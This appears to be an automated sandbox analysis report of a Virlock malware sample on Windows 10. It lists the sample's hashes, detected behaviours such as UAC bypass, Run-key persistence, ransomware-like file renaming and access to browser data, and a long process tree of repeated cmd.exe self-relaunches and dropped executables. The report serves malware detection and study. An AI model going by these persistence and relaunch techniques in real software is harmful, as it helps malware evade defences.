Analysis
-
max time kernel
150s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
25-05-2024 19:53
General
-
Target
2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe
-
Size
189KB
-
MD5
6d874e41449792478345cbc917bfbb5d
-
SHA1
3a8888f4cb9cf6490afc04e80177dd37b445ada2
-
SHA256
a751a60b06499e204d9abfaf588df1954c2d0b33226bc426473907256147a389
-
SHA512
ba3242860f70f46a39351ca4c51534cfafc6d3126817ada92a7200d1b8a5938d8a5c2760ada050d455ed08f03aa8c309e4696e3d3f1a1ea15856fd78ec7e4c0d
-
SSDEEP
3072:2ieAr74wFkOLyIwxUwwwW2NMwowwS46mMFRwqgLYbXzooHj1WcL6+20+7XHpksii:3KaM46mMFRwqgLYbXzooHj1Wy6xDXJkq
Malware Config
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs
-
UAC bypass 3 TTPs 64 IoCs
-
Renames multiple (74) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Modifies registry key 1 TTPs 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\TWUAwwAQ\jEwMIsQk.exe"C:\Users\Admin\TWUAwwAQ\jEwMIsQk.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\bWQIwssY\nEUUIQsA.exe"C:\ProgramData\bWQIwssY\nEUUIQsA.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"8⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock9⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"10⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock11⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"12⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock13⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"14⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock15⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"16⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock17⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"18⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock19⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"20⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock21⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"22⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"24⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock25⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"26⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock27⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"28⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock29⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"30⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock31⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"32⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock33⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"34⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock35⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"36⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock37⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"38⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock39⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"40⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock41⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"42⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock43⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"44⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock45⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"46⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock47⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"48⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock49⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"50⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock51⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"52⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV153⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock53⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"54⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV155⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock55⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"56⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock57⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"58⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock59⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"60⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV161⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock61⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"62⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock63⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"64⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock65⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"66⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock67⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"68⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock69⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"70⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock71⤵
- Adds Run key to start application
-
C:\Users\Admin\JkAAAEwU\IiEgkQIM.exe"C:\Users\Admin\JkAAAEwU\IiEgkQIM.exe"72⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 22473⤵
- Program crash
-
C:\ProgramData\lAoMQcsw\SUEAAIsM.exe"C:\ProgramData\lAoMQcsw\SUEAAIsM.exe"72⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 22473⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"72⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV173⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock73⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"74⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV175⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock75⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"76⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock77⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"78⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock79⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"80⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock81⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"82⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock83⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"84⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV185⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock85⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"86⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock87⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"88⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"90⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock91⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"92⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock93⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"94⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock95⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"96⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV197⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock97⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"98⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock99⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"100⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock101⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"102⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock103⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"104⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1105⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock105⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"106⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock107⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"108⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock109⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"110⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock111⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"112⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock113⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"114⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1115⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"116⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock117⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock"118⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1119⤵
-
C:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock.exeC:\Users\Admin\AppData\Local\Temp\2024-05-25_6d874e41449792478345cbc917bfbb5d_virlock119⤵
-
